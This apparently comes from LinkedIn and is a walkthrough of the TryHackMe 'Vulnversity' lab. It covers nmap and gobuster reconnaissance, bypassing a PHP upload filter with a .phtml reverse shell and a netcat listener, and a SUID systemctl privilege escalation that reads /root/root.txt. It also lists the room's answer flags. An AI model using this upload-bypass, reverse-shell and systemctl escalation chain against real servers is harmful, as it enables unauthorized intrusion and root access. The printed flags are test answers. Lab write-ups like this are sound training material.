Vulnversity — Walkthrough Tryhackme
Vrijanandan Kumar
Cyber Security Enthusiast || CTF Player || Security Researchers || Passionate about Securing the Digital World || CEH
Introduction
"Vulnversity" is an introductory level room on TryHackMe that covers various penetration testing methodologies and tools. It includes tasks such as scanning, enumeration, exploitation, and post-exploitation techniques.
Task 1: Deploy the Machine
Task 2: Reconnaissance
Use 'Nmap ' to scan the target machine. Run a basic scan.
nmap -sC -sV
We can see that ports 21, 22, 139, 445, 3128 and 3333 are open.
It is visible that the OS is Ubuntu, on which the WebServer(port 3333) is running.
Scan the box, how many ports are open?
Ans. 6
What version of the squid proxy is running on the machine?
Ans. 3.5.12
What is the most likely operating system this machine is running?
Ans. Ubuntu
What port is the web server running on?
Ans.3333
It's essential to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don't forget that ports on a higher range might be open, so constantly scan ports after 1000 (even if you leave checking in the background).
Ans. No answer needed
What is the flag for enabling verbose mode using Nmap?
Ans. -v
Task 3: Locating directories using Gobuster:
Gobuster is a tool used in penetration testing to search for hidden directories and files on web servers.
Also to used to brute-force URIs (directories and files), DNS subdomains, and virtual host names.
Gobuster flags include:
To get started, you will need a wordlist for Gobuster (which will be used to quickly go through the wordlist to identify if a public directory is available. If you are using Kali Linux, you can find many wordlists under /usr/share/wordlists. You can also use the wordlist for directories located at /usr/share/wordlists/dirbuster/directory-list-1.0.txt in the AttackBox.
gobuster dir -u https://10.10.25.81:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
We discover an /internal directory and further investigation reveals an /internal/uploads directory.
What is the directory that has an upload form page?
Ans. /internal/
Task 4: Compromise the webserver
We try to upload a php reverse shell script but the extension is being filtered.
We start Burp Suite and enable it in FoxyProxy. Then, create a file with different PHP extensions for the Sniper attack.
领英推荐
We capture the upload request and then send it to Intruder.
We load our payload as a straightforward list.
We initiate our attack and obtain the results. Interestingly, every extension returns a Status 200, but the length of the .phtml extension differs from the others.
I uploaded a reverse PHP shell from PentestMonkey and accessed it at "/internal/uploads/rev-shell.phtml". I also configured a Netcat listener on TCP port 1234. Then, I modified the file extension to ".phtml".
We start a netcat listener: then visit Upload your shell and navigate to?https://10.10.25.81:3333/internal/uploads/php-reverse-shell.phtml - This will execute your payload.
nc -lvnp 1234
What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.
Ans. .php
I understand the Burpsuite tool and its purpose during pentesting.
Ans. No answer needed
What extension is allowed after running the above exercise?
Ans. .phtml
While completing the above exercise, I have successfully downloaded the PHP reverse shell.
Ans. No answer needed
What is the name of the user who manages the webserver?
Ans. bill
cd /home
ls
bash -i
cd bill
ls
cat user.txt
What is the user flag?
Ans. 8bd7992fbe8a6ad22a63361004cfcedb
Task 5: Privilege Escalation:
With the reverse shell in place, you need to escalate your privileges to gain full control of the machine. Check for any sudo privileges or SUID binaries that might be exploitable:
find / -perm -u=s -type f 2>/dev/null
We notice that /bin/systemctl is a SUID binary, which we can leverage to obtain elevated privileges. Let's refer to GTFOBins and search for systemctl.
Reference: [https://gtfobins.github.io/gtfobins/systemctl/]
We create a temporary service and then use that to view root.txt file
TF=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' >$TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
cd /tmp
cat output
On the system, search for all SUID files. Which file stands out?
Ans. /bin/systemctl
What is the root flag value?
Ans. a58ff8579f0a9270368d33a9966c7fd5
Thank you very much for reading. I hope this is helpful to you. If you have any suggestions or something to add, feel free to contact me anytime.
Happy Hacking!
Cyber Security Enthusiast || CEHv12 || CTF Player || Security Researchers || TryHacMe Top 1% ||Programing C,Python || Bug Bounty ||
8 个月Useful tips